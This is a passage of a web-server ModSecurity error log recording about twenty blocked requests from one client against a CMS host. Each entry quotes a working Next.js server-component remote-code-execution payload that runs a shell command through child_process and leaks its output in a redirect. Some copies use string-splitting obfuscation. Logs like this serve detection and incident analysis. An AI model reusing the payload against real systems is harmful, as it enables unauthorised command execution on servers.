'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _yolk=Buffer.from(_xolb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yolk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1PwAAAQM"] [Tue Feb 17 01:30:19.430016 2026] [:error] [pid 20915:tid 20940] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _nnse=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _scwc=Buffer.from(_nnse).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_scwc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1QAAAAQ4"] [Tue Feb 17 01:30:19.447095 2026] [:error] [pid 20915:tid 20948] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sgno=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kshg=Buffer.from(_sgno).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kshg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1QQAAARY"] [Tue Feb 17 01:30:19.463399 2026] [:error] [pid 20915:tid 20938] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vwlb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nemc=Buffer.from(_vwlb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nemc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1QwAAAQw"] [Tue Feb 17 01:30:19.480277 2026] [:error] [pid 20915:tid 20936] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _aqik=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xhww=Buffer.from(_aqik).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xhww};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1RAAAAQo"] [Tue Feb 17 01:30:19.497006 2026] [:error] [pid 20915:tid 20927] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _igjn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mybt=Buffer.from(_igjn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mybt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1RQAAAQE"] [Tue Feb 17 01:30:19.513575 2026] [:error] [pid 20915:tid 20944] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vlgh=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _dyck=Buffer.from(_vlgh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dyck};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1RgAAARI"] [Tue Feb 17 01:30:19.529923 2026] [:error] [pid 20915:tid 20926] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gjpz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _akct=Buffer.from(_gjpz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_akct};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1RwAAAQA"] [Tue Feb 17 01:30:19.545982 2026] [:error] [pid 20915:tid 20933] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gvrr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qmvb=Buffer.from(_gvrr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qmvb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1SAAAAQc"] [Tue Feb 17 01:30:19.564326 2026] [:error] [pid 20915:tid 20937] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _rodo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _iiuz=Buffer.from(_rodo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_iiuz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1SQAAAQs"] [Tue Feb 17 01:30:19.580974 2026] [:error] [pid 20915:tid 20935] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ockk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rjhu=Buffer.from(_ockk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rjhu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1SwAAAQk"] [Tue Feb 17 01:30:19.598411 2026] [:error] [pid 20915:tid 20946] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jziz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hjxl=Buffer.from(_jziz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hjxl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1TAAAARQ"] [Tue Feb 17 01:30:19.615450 2026] [:error] [pid 20915:tid 20932] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zfnk=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _wsmo=Buffer.from(_zfnk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wsmo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1TQAAAQY"] [Tue Feb 17 01:30:19.631829 2026] [:error] [pid 20915:tid 20934] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ztog=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rooi=Buffer.from(_ztog).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rooi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1TgAAAQg"] [Tue Feb 17 01:30:19.648744 2026] [:error] [pid 20915:tid 20941] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gaem=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rokr=Buffer.from(_gaem).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rokr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1TwAAAQ8"] [Tue Feb 17 01:30:19.664748 2026] [:error] [pid 20915:tid 20931] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _iqgf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ixan=Buffer.from(_iqgf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ixan};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1UAAAAQU"] [Tue Feb 17 01:30:19.680792 2026] [:error] [pid 20915:tid 20943] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xhxx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jzcs=Buffer.from(_xhxx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jzcs};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1UQAAARE"] [Tue Feb 17 01:30:19.696950 2026] [:error] [pid 20915:tid 20930] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zkph=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yhfc=Buffer.from(_zkph).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yhfc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1UgAAAQQ"] [Tue Feb 17 01:30:19.712727 2026] [:error] [pid 20915:tid 20945] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _equc=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _bntl=Buffer.from(_equc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bntl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1UwAAARM"] [Tue Feb 17 01:30:19.730279 2026] [:error] [pid 20915:tid 20928] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ijbj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nrfy=Buffer.from(_ijbj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nrfy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1VAAAAQI"] [Tue Feb 17 01:30:19.746584 2026] [:error] [pid 20915:tid 20947] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 